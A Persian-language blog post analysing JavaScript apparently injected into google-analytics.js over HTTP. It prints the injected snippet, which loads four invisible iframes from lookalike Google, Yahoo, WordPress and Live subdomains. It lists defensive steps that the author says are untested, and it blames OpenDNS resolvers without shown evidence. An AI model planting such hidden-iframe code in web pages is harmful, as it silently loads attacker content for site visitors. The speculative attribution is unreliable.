صفحه اصلی وبلاگ تزریق کدهای مخرب به فایل اسکریپت گوگل آنالیتیک – حمله خاموش DNS

دوستان و عزیزان گروه مازع اعلام می کند حمله خاموش DNS یا DNS Silent Attack نوعی از Black Hole است و در این راستا طی مشکل امنیتی بوجود آمده برای فایل:

http://www.google-analytics.com/analytics.js

در اولین باری که از یک صفحه که دارای کدهای گوگل آنالیتیک می باشد بروز شود خطهای زیر به این فایل اضافه میشود:

 


var obj1=document.createElement('iframe');obj1.setAttribute("src",
"http://login.translate.google.com/index?sid=8282456d32de21da8a27061634e8f7ac");obj1.style.border='0px';obj1.style.width='0px';obj1.style.height='0px';document.body.appendChild(obj1);
var obj2=document.createElement('iframe');obj2.setAttribute("src",
"http://css.yimg.uk.mail.yahoo.com/default?sid=8282456d32de21da8a27061634e8f7ac");obj2.style.border='0px';obj2.style.width='0px';obj2.style.height='0px';document.body.appendChild(obj2);
var obj3=document.createElement('iframe');obj3.setAttribute("src",
"http://wpicture248451295.wordpress.com/picture?sid=8282456d32de21da8a27061634e8f7ac");obj3.style.border='0px';obj3.style.width='0px';obj3.style.height='0px';document.body.appendChild(obj3);
var obj4=document.createElement('iframe');obj4.setAttribute("src",
"http://bay1690.login.live.com/checklive?sid=8282456d32de21da8a27061634e8f7ac");obj4.style.border='0px';obj4.style.width='0px';obj4.style.height='0px';document.body.appendChild(obj4);

نکته: کدهای مخرب  حمله خاموش یا DNS Silent Attack در حالت امن (https) ایجاد نمی شود!

آنچیزی که ظاهرا میتوان از حمله خاموش نتیجه گرفت ممکن است یک حمله بسیار بسیار گسترده از نوع DDOS باشد به چند قول بزرگ دنیا ۱- گوگل ۲- یاهو ۳-وردپرس ۴- مایکروسافت.
احتمال بعدی که می توان با وجه ای پیشرفته تر در نظر گرفت اعمال ابزارهای مخرب توسط لینکهایی جعلی برای شناسایی و یافتن مشکلات و باگهای موجود در مرورگر قربانی است که در نهایت با استفاده از ضعفهای یافته شده ابزارهای دیگری از قبیل دزدی کلیدها (یا کلیدنگار یا کی‌لاگر یا Keylogger) یا تروجان یا ایجاد دسترسی به سخت افزار مانند وب کم و امثال آنها را میتوان بر روی سیستم قربانی اعمال نمود.
مسئله بعدی این است که این اتفاق به این منذله است که واسطی (نفرسومی) در ارتباط بین سایت گوگل (http://www.google-analytics.com) و کاربر وجود دارد و در این باره میتوان احتمالات زیادی را داد!!

طی تحقیقات انجام شده از طرف گروه مازع تمامی آدرسهایی که به اسکریپت فوق تزریق می شوند اینها هستند:


http://login.translate.google.com جعلی
http://css.yimg.uk.mail.yahoo.com جعلی
http://wpicture248451295.wordpress.com جعلی
http://bay1690.login.live.com جعلی

اما قسمت جالب ماجرا نتایج بدست آمده از آی پی این ساب دامین ها است:

http://login.translate.google.com                ۵٫۳۹٫۲۲۰٫۲۴۱
http://css.yimg.uk.mail.yahoo.com                 ۵٫۳۹٫۲۲۰٫۲۴۱
http://wpicture248451295.wordpress.com        ۵٫۳۹٫۲۲۰٫۲۴۱
http://bay1690.login.live.com                     ۵٫۳۹٫۲۲۰٫۲۴۱

بعله تمامی این ساب دامین ها مربوط به یک آی پی و در نهایت یک سرور می شوند(نفرسومی) خوب حالا برویم سراغ قسمت جالبتر ماجرا ههه.

خوب چیز جالب دیگه که در این مورد وجود داره اینه:

http://www.google-analytics.com                ۵٫۳۹٫۲۲۰٫۲۴۱

بر اساس بررسی های انجام شده این لینکها ممکنه در هر موقعیت جغرافیایی در دنیا تغییر کنه و نکته قابل توج اینه که آدرس www.google-analytics.com در هر منطقه جغرافیایی متفاوت هست!

این آی پی مربوط میشه به یه سرور پروکسی!!!!! یعنی تمامی ساب دامینهای فوق مربوط می شن به یک سرور که در نت به عنوان یک سرور رایگان ارائه دهنده پروکسی در منطقه آمستردام، هلند شمالی شناخته میشود و دارای سیستم عامل میزبانی شده لینوکس نسخه CentOS می باشد و از وب سرور Apache/2.2.3 استفاده می کند و زبان برنامه نویسی ظاهرا PHP/5.1.6 می باشد .

خوب چه باید کرد؟

ما چند سولشن را برای محافظت در برابر این مشکل به شما دوستان عزیز ارائه میدیم که بسته به نوع کاربری و نوع کاریتون از هرکدوم که می خواهید استفاده نمایید:

متد اول: اینکه فایل hosts ویندوزتون رو ادیت کنید و آی پی و دامین های فوق را بر روی آی پی لوکال ست نمایید.

متد دوم: با استفاده از متدهای رمزنگاری هش یا به اصلاح مقدار رشته ای از کل فایل بدست بیاورید و موقع فرآخوانی بررسی کنید که آیا این فایل همان فایل اصلی است یا فایلی است که در آن تزریق صورت گرفته.

متد سوم: توسط فایروال هاتون این آی پی و پرت ها یا در صورت امکان این درخواستها که توسط متد GET ارسال میشه رو بلاک کنید.

متد چهارم: فایلها و اسکریپتهای مربوط به گوگل آنالیتیک را در سرور و هاست خود نگهداری کنید، توجه فرمایید که در این حالت گوگل آنالیتیک ممکن است اخطار نبودن کدهای مربوطه در سایت شما را بدهد اما شما میتوانید قسمت دیتا های سایت خود را در پنل گوگل آنالیتیک خود چک نمایید و در صورت دریافت داده توسط سرورهای گوگل به اخطار گوگل توجه ننمایید.

متد پنجم: فایل htaccess هاست خود را ادیت کرده و دسترسی آی پی فوق را به سایتتون ببندید.

متد ششم: استفاده از پروتکل https.

نکته نهایی: دوستان مراحل فوق امتحان نشده اند و به صورت تئوریک بیان شده اند لطفا قبل از استفاده حتما امتحان و نتیجه را اعلام نمایید و به دلیل فیلتر بودن بعضی از این آدرسها شما میتوانید تنظیمات اعمال شده را برای آی پی ۱۰٫۱۰٫۳۴٫۳۴ یا سایت peyvandha.ir اعمال نمایید.

اما مشکل اصلی بوجود آمدن حمله خاموش DNS یا DNS Silent Attack چیست؟

پس از ارائه تمامی مطالب فوق باید متاسفانه این نکته را بیان کنیم که این مشکل و این نوع حمله به دلیل ست کردن DNS های معتبر OpenDNS می باشد و درصورتی که دچار این مشکل شده اید کافی است که دی ان اس های خود را تغییر دهید و کار تمام است.

لیست DNS های آلوده به حمله DNS Silent Attack (این به هیچ عنوان یک لیست کامل نیست!!):


۲۰۸٫۶۷٫۲۲۲٫۲۲۲
۲۰۸٫۶۷٫۲۲۰٫۲۲۰